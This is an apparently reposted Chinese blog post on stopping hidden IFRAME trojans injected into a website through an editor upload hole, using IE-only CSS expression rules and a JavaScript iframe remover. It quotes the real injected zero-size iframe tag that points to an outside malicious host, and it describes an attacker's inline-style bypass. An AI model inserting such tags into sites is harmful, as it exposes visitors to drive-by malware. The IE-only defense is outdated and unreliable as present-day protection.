解决网站防挂IFRAME木马方案

IFRAME木马解决方案

今天一上服务器2000多个<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0></iframe> 被注入,我晕!检查了半天,原来是FckEditor编辑器上传漏洞导致。在找资料的同时,发现CSS有一个有趣的属性expression,发现这个东东还有点意思,由此写出来,“以儆效尤”!   引用:“IE5 及其以后版本支持在CSS中使用expression,用来把CSS属性和JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。就是说CSS属性后面可以是一段JavaScript表达式,CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接 引用元素自身的属性和方法,也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。”我的理解是:expression后面接js表达式执行相关操作   格式: (1)标记固有的CSS属性名:expression(JS表达式); (2)自定义属性名:expression(JS表达式); 使用JS销毁iframe对象原理:使iframe里的请求地址变成空白页(about:blank),再将iframe对象从DOM(文档对象模型)中移除就可以切断所有iframe里的请求了。 CSS代码:iframe{WuWei:expression(this.src='about:blank',this.outerHTML='');} 解释:outerHTML属性是DOM对象包含自身的HTML代码,而 innerHTML则是DOM对象(不含本身)里面所包含的HTML代码。 例子如下: 如果要使自己的iframe显示在网页里,而别人挂的IFRAME马都不起作用,在CSS里加一个 #okiWuWei{iWuWei:expression() !important} 对应的IFRAME代码为: <iframe id="okiWuWei"  src="http://blog.csdn.net/codeshark/"></iframe>就OK了。 问题总结:很多垃圾站点都通过“弹窗”的方式来增加自己的点击率跟访问量,估计也是通过iframe注入木马,然后达到这种效果的。当然次方法只是IE ONLY.也不能从根本上防止木马的注入。

首先,新建一个网页,插入以上的CSS代码(或在您现有的CSS代码里加入上面那句): <style type="text/css"> iframe{WuWei:expression(this.src='about:blank',this.outerHTML='');} </style> 然后在这个页面插入几个IFRAME代码,假设它们是被挂的木马网页。代码如下: <iframe src=""></iframe>  <iframe src="http://blog.csdn.net/codeshark/"></iframe>无为博客
因为FF(Firefox)不怕IFRAME,于是就拿IE开刀,不知道比尔有没有奖发。我只写了一句代码,就搞定了,哈,痛快。就是IE only(特有的)的CSS中的属性e­xpression,插进去试试,果然那些IFRAME不起作用了。

代码如下:

<style type="text/css" media="all" id="http://safe3.cn"> /*<![CDATA[*/ iframe{ v:e­xpression(this.src='about:blank',this.outerHTML='');/*使用IE Only 的样式会除所有 IFRAME */ } #f126{v:e­xpression() !important} //如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="f126"; /*]]>*/ </style>

分析:前缀:e­xpression(表达式);

  这个前缀是可以随意更换的,我上面取名为"v",例如我可以换成:abc123:e­xpression(this.src='about: blank',this.outerHTML=''); 挂木马的家伙得先看你的CSS里这个前缀,然后挂马的时候写成这样<iframe style="abc123:e­xpression() !important" src="URL"></iframe>,那个前缀一定要是和你的网站一样的(abc123),才能挂到马,哈哈哈!如果把前缀做成动态的,就非常OK了,看你怎么挂!

优点:

可以解决一些站长的烦恼,无须去理会人家插了多少IFRAME木马,那些IFRAME都不起作用;

保护了访客的安全,这些IFRAME不执行,不下载,就不会破坏到访问的电脑;

代码简单,仅一句CSS样式,不管你是ASP,ASP.NET,JSP,PHP还是RUBY,都通用;

缺点:

只适合防御目前的挂IFRAME方案;

使得人家挂马的方式要改变了,挂马者可以构造这样的代码<iframe style="v:e­xpression() !important" src="URL"></iframe>使我的防御方式失效,不过挂马都一定得看我的CSS里e­xpression前面的这个"v" 字母,我可以换成任意的如:xgz:e­xpression(...),哈哈哈,他也拿我没办法,再如,如果我这个前缀是变化的,是不是也行吖 *_*

不能防御其他标记的马,如<script>、<applet>、<object>等。到那时候再来找我吧,呵呵~ 网页里插入的IFRAME还是存在,只是不起作用了;

再加固防线,加入以下JS代码——其实这个代码可以完全不用:

<script type="text/javascript" language="javascript"> //<![CDATA[ function killfrm() { var xgzfrm=document.getElementsByTagName("iframe"); for(var i=0;i<xgzfrm.length;i++)//循环检查所有IFRAME标记,把所有IFRAME的URL都改为空白页,然后删除IFRMAE标记; { xgzfrm[i].src='about:blank'; xgzfrm[i].outerHTML=''; } } window.οnlοad=killfrm;//一边加载页面,一边执行这个JS方法; //]]> </script>

另外转一种解决方案——这种方案不知道管不管用,没试过,方法如下:

在网页最后加入<xmp>,再用css控制它的显示方式,如:xmp { width:1px; overflow:hidden; text-overflow:clip; white-space: nowrap; clear: none; float: none; line-height: 0px; display: inline; }

 

本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/kongwei521/archive/2008/06/26/2589014.aspx

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值